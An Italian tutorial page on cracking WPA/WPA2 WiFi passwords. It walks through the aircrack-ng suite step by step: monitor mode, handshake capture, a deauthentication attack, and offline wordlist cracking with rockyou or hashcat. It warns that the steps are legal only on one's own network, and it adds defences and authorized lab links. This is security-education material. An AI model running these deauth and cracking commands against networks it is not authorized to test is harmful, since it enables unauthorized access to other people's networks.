Home › Rete & Wireless › WiFi Cracking

WiFi Cracking (WPA/WPA2)

Catturare l'handshake WPA2 e craccarlo offline con una wordlist. Solo sulla TUA rete.

Legge. Testare una rete WiFi che non è tua (vicino, bar, ufficio) è accesso abusivo ed è reato. Fai questo esclusivamente sul tuo router/access point o in lab dedicati.

Teoria: il 4-way handshake

Quando un dispositivo si connette a una rete WPA2, scambia col router un 4-way handshake: 4 messaggi che provano la conoscenza della password senza inviarla in chiaro. Se catturi questo handshake, puoi provare offline miliardi di password: per ognuna calcoli cosa dovrebbe produrre l'handshake e confronti. Se combacia → password trovata.

Serve una scheda WiFi che supporti la monitor mode e l'injection (molte interne dei laptop no; le chiavette Alfa sì).

Procedura completa (aircrack-ng)

Questi sono i comandi passo-passo. wlan0 è la tua scheda; CANALE e TUO_BSSID li leggi al passo 2.

0. Salva i file sul Desktop

cd ~/Desktop

1. Metti la scheda in monitor mode

sudo airmon-ng check kill       # chiude i processi che disturbano
sudo airmon-ng start wlan0       # crea l'interfaccia wlan0mon

2. Trova la tua rete

sudo airodump-ng wlan0mon
# premi Ctrl+C quando vedi il tuo BSSID e il suo CANALE

3. Ascolta la tua rete e salva la cattura

sudo airodump-ng -c CANALE --bssid TUO_BSSID -w cattura wlan0mon
# lascia questo terminale aperto, in attesa dell'handshake

4. (In un NUOVO terminale) forza il deauth per catturare l'handshake

sudo aireplay-ng --deauth 5 -a TUO_BSSID wlan0mon
# disconnette brevemente un TUO dispositivo: al riconnettersi rifà l'handshake
# nel terminale del passo 3 apparirà "WPA handshake: TUO_BSSID"

5. Cracking con la wordlist

# scompatta rockyou se non l'hai già fatto:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
sudo aircrack-ng ~/Desktop/cattura-01.cap -w /usr/share/wordlists/rockyou.txt
# se la password è nella wordlist → "KEY FOUND! [ password ]"

6. Ripristina la scheda

sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
In alternativa puoi craccare l'handshake con hashcat -m 22000 (molto più veloce con GPU): converti il .cap con hcxpcapngtool. Vedi Attacchi password.

Difesa

  • Password WiFi lunga e casuale (12+ caratteri): rende inutile la wordlist.
  • WPA3 dove possibile (SAE resiste al brute force offline).
  • Disattiva WPS (vulnerabile a Pixie Dust / brute PIN).

Lab / pratica autorizzata

THMWifi Hacking 101FacileTeoria e pratica del cracking WPA in ambiente guidato. WEBWiFi Challenge LabVarioLab dedicato al WiFi hacking senza bisogno di hardware tuo.
Il modo più sicuro e legale di allenarti: il tuo router di casa, o un vecchio access point comprato apposta.
Sui tuoi libri: Hacking Wireless Networks for Dummies, Wireless Network Security, Offensive Security – Wireless Attacks (WiFu). Vedi Risorse.